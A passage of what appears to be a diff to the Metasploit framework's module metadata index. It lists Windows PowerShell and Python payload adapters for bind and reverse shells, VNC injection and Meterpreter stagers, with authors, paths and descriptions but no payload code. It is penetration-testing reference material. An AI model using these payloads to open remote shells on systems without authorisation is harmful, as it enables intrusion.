"autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/shell/bind_tcp_uuid": { + "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/shell/reverse_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/shell/reverse_tcp_rc4": { + "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/shell/reverse_tcp_uuid": { + "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/shell_bind_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/powershell/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/shell_reverse_tcp": { + "name": "Powershell Exec, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/powershell/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_tcp": { + "name": "Powershell Exec, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/vncinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_http": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_https": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp": { + "name": "Powershell Exec, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_winhttp": { + "name": "Powershell Exec, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/powershell/x64/vncinject/reverse_winhttps": { + "name": "Powershell Exec, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "OJ Reeves" + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_cmd/windows/powershell_bind_tcp": { + "name": "Windows Interactive Powershell Session, Bind TCP", + "fullname": "payload/cmd/windows/powershell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy" + ], + "description": "Interacts with a powershell session on an established socket connection", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/cmd/windows/powershell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/powershell_reverse_tcp": { + "name": "Windows Interactive Powershell Session, Reverse TCP", + "fullname": "payload/cmd/windows/powershell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy" + ], + "description": "Interacts with a powershell session on an established socket connection", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/powershell_reverse_tcp_ssl": { + "name": "Windows Interactive Powershell Session, Reverse TCP SSL", + "fullname": "payload/cmd/windows/powershell_reverse_tcp_ssl", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Ben Turner", + "Dave Hardy" + ], + "description": "Interacts with a powershell session on an established SSL socket connection", + "references": [ + "URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-04 00:33:03 +0000", + "path": "/modules/payloads/singles/cmd/windows/powershell_reverse_tcp_ssl.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell_reverse_tcp_ssl", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_cmd/windows/python/exec": { + "name": "Python Exec, Python Execute Command", + "fullname": "payload/cmd/windows/python/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nExecute an arbitrary OS command. Compatible with Python 2.7 and 3.4+.", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/exec", + "staged": false + }, + "payload_cmd/windows/python/meterpreter/bind_tcp": { + "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager", + "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp" + }, + "payload_cmd/windows/python/meterpreter/bind_tcp_uuid": { + "name": "Python Exec, Python Meterpreter, Python Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/python/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "OJ Reeves" + ], + "description": "Execute a Python payload from a command.\n\nRun a meterpreter server in Python (compatible with 2.5-2.7 & 3.1+).\n\nListen for a connection with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-01-20 14:53:59 +0000", + "path": "/modules/payloads/adapters/cmd/windows/python.rb", + "is_install_path": true, + "ref_name": "cmd/windows/python/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/python", + "adapted_refname": "python/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "python/meterpreter", + "stager_refname": "python/bind_tcp_uuid" + }, + "payload_cmd/windows/python/meterpreter/reverse_http": { + "name": "Python Exec, Python Meterpreter, Python Reverse HTTP Stager", + 